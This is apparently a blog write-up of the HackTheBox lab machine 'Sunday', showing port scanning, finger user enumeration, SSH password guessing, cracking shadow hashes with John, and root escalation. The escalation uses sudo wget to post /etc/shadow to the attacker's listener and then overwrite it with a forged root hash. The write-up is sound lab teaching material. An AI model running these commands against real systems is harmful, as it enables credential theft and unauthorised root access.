HackTheBox: Sunday

I started the machine by running NMap against it:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/Documents/sunday]
โ””โ”€# nmap -p- -sV -sC -O -oN scan 10.10.10.76 --min-rate 1000 --max-retries 5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 08:30 EST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (5).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.64% done; ETC: 08:36 (0:04:16 remaining)
Stats: 0:03:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 57.03% done; ETC: 08:36 (0:02:22 remaining)
Stats: 0:04:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 80.79% done; ETC: 08:36 (0:01:03 remaining)
Stats: 0:07:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.85% done; ETC: 08:37 (0:00:00 remaining)
Nmap scan report for sunday.htb (10.10.10.76)
Host is up (0.025s latency).
Not shown: 51557 filtered ports, 13973 closed ports
PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
40880/tcp open  unknown
44671/tcp open  unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/14%OT=79%CT=7%CU=34844%PV=Y%DS=2%DC=I%G=Y%TM=602927B
OS:D%P=x86_64-pc-linux-gnu)SEQ(CI=I)SEQ(SP=94%GCD=1%ISR=A1%TI=I%CI=I%II=I%S
OS:S=S%TS=7)SEQ(SP=97%GCD=1%ISR=A4%TI=I%CI=I%TS=7)OPS(O1=NNT11M54DNW0NNS%O2
OS:=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O
OS:6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R
OS:=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S)

Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 442.61 seconds

We can see that RCPBind, Finger and SSH are running, as well as 2 unknown services on 40880 and 44671. I started by running the finger command against the machine:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/usr/share/wordlists/SecLists/Usernames]
โ””โ”€# finger @10.10.10.76    
Login       Name               TTY         Idle    When    Where
sunny    sunny                 pts/2            Sun 18:03  10.10.16.148

the username sunny was found. I attempted to login to the Sunday machine via SSH with the username sunny. After a few guesses I discovered that the password Sunday allowed me to login:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/Documents/sunday/finger-user-enum-1.0]
โ””โ”€# ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1                                                              1 โจฏ
Password: 
Last login: Sun Feb 14 18:03:48 2021 from 10.10.16.148
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sunny@sunday:~$ pwd   
/export/home/sunny

Once logged in I did some exploring around the machine and found there was a backup folder in the / directory. This contained the file shadow.backup which included 2 password hashes from the shadow file:

sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
sunny@sunday:/backup$

I copied these hashes into a file on the kali machine called pass.txt. then ran John against it used the rockyou wordlist.

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/Documents/sunday]
โ””โ”€# john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Remaining 1 password hash
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:10 0.66% (ETA: 16:12:53) 0g/s 10928p/s 10928c/s 10928C/s munster1..chambers1
0g 0:00:00:14 0.93% (ETA: 16:12:46) 0g/s 10976p/s 10976c/s 10976C/s shelbourne..marinell
cooldude!        (sammy)
1g 0:00:00:18 DONE (2021-02-15 15:47) 0.05350g/s 10957p/s 10957c/s 10957C/s dompet..bluepen
Use the "--show" option to display all of the cracked passwords reliably
Session completed

From the output, we can see that the password cooldude! was found for the username sammy. I then tried logging into the machine via SSH with the sammy user and the password cooldude!. This was successful and I was able to capture the user flag.

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/Documents/sunday]
โ””โ”€# ssh sammy@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
Password: 
Last login: Fri Jul 31 17:59:59 2020
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sammy@sunday:~$ ls
Desktop  Documents  Downloads  Public
sammy@sunday:~$ cd Desktop                                                                                                                      
sammy@sunday:~/Desktop$ cat user.txt
[REDACTED]

I next needed to escalate privileges to root. I ran the command sudo -l to identify if there were any files that could be executed as root without needing to provide a password:

sammy@sunday:/etc$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

We can see that the get command can be run as root without a password. I created a new shadow file on my kali machine containing a new root hash of my choosing:

I started by generating the new hash:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/.ssh]
โ””โ”€# openssl passwd -5 -salt thesalt pass123                                                                                                 1 โš™
$5$thesalt$aTGFCvQoiBETYFRwWxX8cWu8pBdi9Ei038kAHCIOeh3

I then took a copy of the shadow file currently used on the Sunday machine. I did this using wget running as root, by first creating a Netcat listener on kali:

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/Documents/sunday]
โ””โ”€# nc -nvlp 80                                                                                                                             2 โš™
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

 

Then posting the file from the Sunday machine to my kali listener using sudo wget:

sammy@sunday:/tmp$ sudo wget --post-file=/etc/shadow 10.10.14.15
--02:00:03--  http://10.10.14.15/
           => `index.html'
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response...

The listener then captured this shadow file response.

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/Documents/sunday]
โ””โ”€# nc -nvlp 80                                                                                                                             2 โš™
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.10.76.
Ncat: Connection from 10.10.10.76:40985.
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.15
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 628

root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

I copied the contents of this shadow file to a file on my kali machine called shadow and modified the root line at the top with the hash I generated with the openssl command. So my root entry looked like the following:

root:$5$thesalt$aTGFCvQoiBETYFRwWxX8cWu8pBdi9Ei038kAHCIOeh3:::::::

This shadow file was then hosted via python HTTP server and downloaded back onto the Sunday machine, overwriting the original shadow file:

sammy@sunday:/etc$ sudo wget http://10.10.14.15:8000/shadow -O /etc/shadow
--01:59:50--  http://10.10.14.15:8000/shadow
           => `/etc/shadow'
Connecting to 10.10.14.15:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 628 [application/octet-stream]

100%[====================================================================================================>] 628           --.--K/s             

01:59:50 (796.26 KB/s) - `/etc/shadow' saved [628/628]

Once downloaded I then attempted to switch user to root using the password I entered when creating the new hash (pass123)

sammy@sunday:/tmp$ su root
Password: 
sammy@sunday:/tmp# whoami
root
sammy@sunday:/tmp# cd /root
sammy@sunday:/root# ls
overwrite       root.txt        troll           troll.original
sammy@sunday:/root# cat root.txt
[REDACTED]

As you can see from the output, this was successful and I was able to capture the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *